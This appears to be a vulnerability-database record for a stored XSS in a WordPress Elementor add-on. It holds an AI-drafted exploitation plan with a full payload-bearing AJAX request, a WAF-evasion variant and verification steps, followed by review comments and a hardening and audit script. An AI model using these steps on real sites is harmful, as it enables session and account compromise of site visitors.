[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fNrrzIyW5wKkMSNK7_-wxjd4YQ4kMXnn6CrlcrK0l4fA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-5159","royal-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-follow-button-text-parameter","Royal Addons for Elementor \u003C= 1.7.1056 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'Follow Button Text' Parameter","The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget's 'instagram_follow_text' setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 
Note that exploitation requires that an administrator has previously configured the Instagram Feed widget with a valid Instagram access token on the site.","royal-elementor-addons",null,"\u003C=1.7.1056","1.7.1057","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-04 14:53:29","2026-05-05 03:37:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fee96d8c5-baf0-4c5c-9ace-e88bbb95ee0a?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fplugin-options.php","admin\u002Ftemplates\u002Flibrary\u002Fwpr-templates-data.php","assets\u002Fcss\u002Fadmin\u002Feditor.min.css","assets\u002Fcss\u002Ffrontend.css","assets\u002Fcss\u002Ffrontend.min.css","assets\u002Fjs\u002Fadmin\u002Feditor.js","assets\u002Fjs\u002Fadmin\u002Feditor.min.js","assets\u002Fjs\u002Ffrontend.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-5159\n\n## 1. Vulnerability Summary\nThe **Royal Addons for Elementor** plugin (up to version 1.7.1056) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the Instagram Feed widget's processing of the `instagram_follow_text` setting. Due to missing input sanitization and output escaping, a user with Contributor-level access or higher can inject arbitrary scripts into a page via the Elementor editor. These scripts execute when any user views the affected page.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (via Elementor's `elementor_ajax` action).\n- **Vulnerable Parameter:** `instagram_follow_text` within the widget settings JSON.\n- **Authentication Level:** Contributor+.\n- **Precondition:** An Administrator must have previously configured a valid-looking Instagram Access Token in the plugin's settings (usually stored in `wp_options` as something like `wpr_instagram_access_token` or configured in the widget settings).\n- **Payload:** `\u003Cscript>alert(document.domain)\u003C\u002Fscript>` or an admin-account-takeover payload.\n\n## 3. Code Flow\n1.  **Entry Point:** An authenticated Contributor user opens a post in the Elementor Editor.\n2.  **Input:** The user adds the `wpr-instagram-feed` widget to the page and modifies the \"Follow Button Text\" (`instagram_follow_text`) setting.\n3.  **Data Storage:** When the user clicks \"Update\" in Elementor, a `POST` request is sent to `admin-ajax.php` with the action `elementor_ajax`; the `actions` JSON carries the `save_builder` command and the target post is passed as `editor_post_id`. Elementor saves the widget settings as a JSON blob in the `_elementor_data` post meta.\n4.  **Widget Rendering:** The plugin registers the widget's frontend handler in `assets\u002Fjs\u002Ffrontend.js` as `wpr-instagram-feed.default`.\n5.  **Sink:** In the PHP `render()` method of the Instagram Feed widget (likely located in `modules\u002Finstagram-feed\u002Fwidgets\u002Fwpr-instagram-feed.php`; the path has not been verified against the plugin source), the code retrieves the setting:\n    ```php\n    $settings = $this->get_settings_for_display();\n    \u002F\u002F ... logic to check for instagram access token ...\n    if ( ! empty( $settings['instagram_follow_text'] ) ) {\n        echo '\u003Cspan class=\"wpr-instagram-follow-text\">' . $settings['instagram_follow_text'] . '\u003C\u002Fspan>'; \u002F\u002F VULNERABLE SINK\n    }\n    ```\n6.  **Execution:** The unescaped HTML\u002FJS is rendered into the public-facing page.\n\n## 4. 
Nonce Acquisition Strategy\nTo save data in Elementor as a Contributor, we need the `elementor_ajax` nonce.\n\n1.  **Create a Page:** Use WP-CLI to create a page and enable Elementor for it.\n2.  **Access Editor:** Navigate to the Elementor editor URL for that page: `\u002Fwp-admin\u002Fpost.php?post=[ID]&action=elementor`.\n3.  **Extract Nonce:** The Elementor configuration object is stored in the global JavaScript variable `elementorCommon`.\n    - Use `browser_eval` to extract the nonce: `browser_eval(\"elementorCommon.config.ajax.nonce\")`.\n4.  **Alternative:** The same value is printed in the page source as `elementorCommonConfig.ajax.nonce` alongside Elementor's common scripts, so it can be read from the editor HTML without executing JavaScript.\n\n## 5. Exploitation Strategy\n### Step 1: Pre-configuration (Admin)\nEnsure the Instagram widget is \"active\" by simulating a valid token configuration. The option name below is the guess from section 2 and has not been confirmed against the plugin source; check where the plugin actually reads the token before relying on it.\n```bash\nwp option update wpr_instagram_access_token \"FAKE_TOKEN_12345\"\n```\n\n### Step 2: Create Target Page (Contributor)\n```bash\nwp post create --post_type=page --post_title=\"XSS Page\" --post_status=publish --post_author=[CONTRIBUTOR_ID]\n# Get the Post ID\n```\n\n### Step 3: Extract Elementor Nonce\nNavigate to the Elementor editor as the Contributor and run:\n`browser_eval(\"window.elementorConfig?.ajax?.nonce || elementorCommon.config.ajax.nonce\")`\n\n### Step 4: Submit Malicious Widget Data\nPerform a `POST` request to `wp-admin\u002Fadmin-ajax.php` using the `http_request` tool.\n\n**Request Details:**\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php?action=elementor_ajax`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- 
**Body:**\n```urlencoded\nactions={\"save_builder\":{\"action\":\"save_builder\",\"data\":{\"status\":\"publish\",\"elements\":[{\"id\":\"[GENERATE_ID]\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"[GENERATE_ID]\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"[GENERATE_ID]\",\"elType\":\"widget\",\"widgetType\":\"wpr-instagram-feed\",\"settings\":{\"instagram_follow_text\":\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\",\"instagram_access_token\":\"FAKE_TOKEN\"}}]}]}]}}}&_nonce=[EXTRACTED_NONCE]&editor_post_id=[POST_ID]\n```\nThe `actions` value is shown unencoded for readability; URL-encode it in the real request body. `save_builder` and `editor_post_id` are the names Elementor's AJAX module expects, and each `[GENERATE_ID]` must be a distinct element ID.\n\n### Step 5: Trigger XSS\nNavigate to the permalink of the created page: `http:\u002F\u002F[target]\u002F?p=[POST_ID]`.\n\n## 6. Test Data Setup\n1.  **User:** Contributor user.\n2.  **Plugin Settings:** The Instagram Feed widget must be enabled. Since version 1.7.1056 is targeted, ensure it is installed and the `wpr_instagram_access_token` is set in the database (or the widget-level setting is used).\n3.  **Elementor:** Elementor must be active and the created page must be edited with Elementor.\n\n## 7. Expected Results\n- The AJAX response should return `{\"success\":true,...}`.\n- Upon viewing the page, an alert box with the site's domain should appear.\n- Viewing the HTML source of the page should show:\n  `\u003Cspan class=\"wpr-instagram-follow-text\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003C\u002Fspan>`\n\n## 8. Verification Steps\n1.  **Verify DB Storage:**\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n    Check that the JSON contains the injected follow text. Elementor stores the meta with `wp_json_encode`, which escapes forward slashes, so the closing tag appears as `\u003C\\\u002Fscript>` in the stored value; grep for `alert(document.domain)` rather than the full closing tag.\n2.  **Confirm Execution:** Use `browser_navigate` to the page and check for the presence of the alert or the script tag in the DOM.\n\n## 9. 
Alternative Approaches\n- **If `save_builder` fails:** Check whether Royal Addons exposes a standalone settings page or its own AJAX handler for Instagram feeds that accepts `instagram_follow_text` outside the Elementor editor, and submit the payload there.\n- **Payload variations:** If `\u003Cscript>` is blocked by a basic WAF, use `img` tags with `onerror`:\n  `\u003Cimg src=x onerror=alert(1)>`\n- **Dependency check:** If the feed doesn't render because the \"token\" is invalid, try to find a widget template that renders the follow button regardless of the feed loading status (e.g., if \"Show Follow Button\" is enabled in settings). Look for the control name `instagram_show_follow` in the widget settings.","The Royal Addons for Elementor plugin is vulnerable to Authenticated Stored Cross-Site Scripting via the 'instagram_follow_text' parameter in the Instagram Feed widget. This allows attackers with Contributor-level access or higher to inject malicious scripts that execute in the context of any user viewing the page, provided a valid Instagram access token has been configured.","\u002F\u002F modules\u002Finstagram-feed\u002Fwidgets\u002Fwpr-instagram-feed.php (assumed location, not verified against the plugin source)\n\n$settings = $this->get_settings_for_display();\n\u002F\u002F ... logic to check for instagram access token ...\nif ( ! empty( $settings['instagram_follow_text'] ) ) {\n    echo '\u003Cspan class=\"wpr-instagram-follow-text\">' . $settings['instagram_follow_text'] . 
'\u003C\u002Fspan>'; \u002F\u002F VULNERABLE SINK\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1056\u002Fadmin\u002Fplugin-options.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1057\u002Fadmin\u002Fplugin-options.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1056\u002Fadmin\u002Fplugin-options.php\t2026-04-03 11:57:32.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1057\u002Fadmin\u002Fplugin-options.php\t2026-04-10 10:58:42.000000000 +0000\n@@ -120,6 +120,8 @@\n     register_setting('wpr-extension-settings', 'wpr-parallax-multi-layer');\n     register_setting('wpr-extension-settings', 'wpr-custom-css');\n     register_setting('wpr-extension-settings', 'wpr-display-conditions');\n+    register_setting('wpr-extension-settings', 'wpr-equal-height');\n+    \u002F\u002F register_setting('wpr-extension-settings', 'wpr-column-slider');\n     register_setting('wpr-extension-settings', 'wpr-sticky-section');\n \n     \u002F\u002F Element Toggle\n@@ -1630,6 +1632,12 @@\n                         echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n                     } elseif ( 'wpr-display-conditions' === $option_name ) {\n                         echo '\u003Cbr>\u003Cspan>Tip: Edit any Element > Navigate to Visibility tab\u003C\u002Fspan>';\n+                    } elseif ( 'wpr-column-slider' === $option_name ) {\n+                        echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n+                        \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\" target=\"_blank\">Watch Video Tutorial\u003C\u002Fa>';\n+                    } elseif ( 'wpr-equal-height' === 
$option_name ) {\n+                        echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n+                        \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\" target=\"_blank\">Watch Video Tutorial\u003C\u002Fa>';\n                     }\n \n                     \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Froyal-elementor-addons.com\u002Felementor-particle-effects\u002F?ref=rea-plugin-backend-extentions-prev\">'. esc_html('View Extension Demo', 'wpr-addons') .'\u003C\u002Fa>';\n... (truncated)","1. Login to the WordPress dashboard with at least Contributor-level permissions.\n2. Create or edit a post\u002Fpage and launch the Elementor Editor.\n3. Add the 'Royal Instagram Feed' widget to the page layout.\n4. In the widget's Content settings, find the 'Follow Button' section and locate the 'Follow Button Text' field (internally `instagram_follow_text`).\n5. Enter a malicious script payload, such as \u003Cscript>alert(document.domain)\u003C\u002Fscript>, into this field.\n6. Save or Update the page to store the payload in the post's Elementor metadata.\n7. View the published page as any user. 
Provided a valid Instagram Access Token has been configured in the plugin settings (a required precondition for the widget to render), the unescaped script will execute in the browser.","gemini-3-flash-preview","2026-05-04 16:42:06","2026-05-04 16:42:26",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.7.1056","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1056","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1056.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1057","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1057.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags"]
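Review bot: in the first hunk of the `admin/plugin-options.php` diff (`@@ -120,6 +120,8 @@`), `register_setting('wpr-extension-settings', 'wpr-column-slider');` is added commented out rather than registered or omitted, which leaves dead code in the settings registration; either register the setting or drop the line. The hunk otherwise only adds `wpr-equal-height` to the extension settings and does not touch the Instagram Feed widget or `instagram_follow_text`, so it is not the change that fixes the stored XSS recorded on this page.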
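Review bot: in the second hunk (`@@ -1630,6 +1632,12 @@`), the new `elseif ( 'wpr-column-slider' === $option_name )` branch appears unreachable while the matching `register_setting` call in the first hunk stays commented out, and both new branches carry a commented-out `echo '<a href="https://www.youtube.com" target="_blank">Watch Video Tutorial</a>'` placeholder pointing at a generic URL; remove the placeholders or wire in the real links before release. Nothing in either visible hunk escapes the widget's follow text, so the diff quoted for `research_fix_diff` should be the hunk from the Instagram Feed widget file rather than this truncated `admin/plugin-options.php` change.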
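Added example, not the plugin's code and not part of the advisory record above: the sink reconstructed in the research plan is shown beside a hardened version that escapes at the point of output, together with an audit function that walks a page's `_elementor_data` JSON and reports `wpr-instagram-feed` widgets whose `instagram_follow_text` already carries markup, which is what a responder wants after patching. The widget type, the control name and the nested `elements` layout are taken from the plan and are assumptions; the `esc_html()` fallback only approximates WordPress's `esc_html()` so the script runs under the php CLI without WordPress loaded; the sample meta value is constructed.

```php
<?php
// Added example; not Royal Addons code. Runs stand-alone under the php CLI.
// Assumptions (from the research plan, unverified): widget type `wpr-instagram-feed`,
// control `instagram_follow_text`, and the nested `elements` layout of `_elementor_data`.

// Stand-in for WordPress esc_html() when WordPress is not loaded. Approximation of
// _wp_specialchars(): ENT_QUOTES, UTF-8, no double-encoding of existing entities.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false );
    }
}

// Vulnerable shape as reconstructed in the plan: the setting is concatenated into HTML as-is.
function wpr_render_follow_text_vulnerable( array $settings ) {
    if ( empty( $settings['instagram_follow_text'] ) ) {
        return '';
    }
    return '<span class="wpr-instagram-follow-text">' . $settings['instagram_follow_text'] . '</span>';
}

// Hardened shape: escape where the value meets HTML. Elementor's get_settings_for_display()
// does not escape control values for the widget, so the widget must do it at the sink.
function wpr_render_follow_text_fixed( array $settings ) {
    if ( empty( $settings['instagram_follow_text'] ) ) {
        return '';
    }
    return '<span class="wpr-instagram-follow-text">' . esc_html( $settings['instagram_follow_text'] ) . '</span>';
}

// Audit helper: recurse through an _elementor_data tree and collect every Instagram Feed
// widget whose follow text contains a tag. strip_tags() is a coarse heuristic, good enough
// to triage stored payloads after the plugin has been updated.
function wpr_find_suspicious_follow_text( array $elements, array &$hits = array() ) {
    foreach ( $elements as $el ) {
        if ( ( $el['elType'] ?? '' ) === 'widget' && ( $el['widgetType'] ?? '' ) === 'wpr-instagram-feed' ) {
            $text = (string) ( $el['settings']['instagram_follow_text'] ?? '' );
            if ( $text !== strip_tags( $text ) ) {
                $hits[] = array( 'id' => $el['id'] ?? '?', 'text' => $text );
            }
        }
        if ( ! empty( $el['elements'] ) && is_array( $el['elements'] ) ) {
            wpr_find_suspicious_follow_text( $el['elements'], $hits );
        }
    }
    return $hits;
}

// Constructed sample of what `wp post meta get <ID> _elementor_data` prints after the
// Step 4 request. wp_json_encode escapes "/" so the closing tag is stored as <\/script>.
$sample_meta = '[{"id":"a1b2c3d4","elType":"section","settings":[],"elements":['
    . '{"id":"e5f6a7b8","elType":"column","settings":{"_column_size":100},"elements":['
    . '{"id":"c9d0e1f2","elType":"widget","widgetType":"wpr-instagram-feed",'
    . '"settings":{"instagram_follow_text":"<script>alert(document.domain)<\\/script>"}},'
    . '{"id":"03a4b5c6","elType":"widget","widgetType":"wpr-instagram-feed",'
    . '"settings":{"instagram_follow_text":"Follow us"}}]}]}]';

$elements = json_decode( $sample_meta, true );
if ( ! is_array( $elements ) ) {
    fwrite( STDERR, "invalid _elementor_data JSON\n" );
    exit( 1 );
}

// Only the first widget is reported; "Follow us" contains no markup.
foreach ( wpr_find_suspicious_follow_text( $elements ) as $hit ) {
    $settings = array( 'instagram_follow_text' => $hit['text'] );
    echo "widget {$hit['id']}: stored follow text contains markup\n";
    echo "  vulnerable render: " . wpr_render_follow_text_vulnerable( $settings ) . "\n";
    echo "  fixed render:      " . wpr_render_follow_text_fixed( $settings ) . "\n";
}
```

To run the audit against a live site, replace `$sample_meta` with the output of `wp post meta get <ID> _elementor_data` for each Elementor-built post; the fixed render is what version 1.7.1057 is expected to produce if it escapes the control at the sink, which the diff quoted on this page does not show.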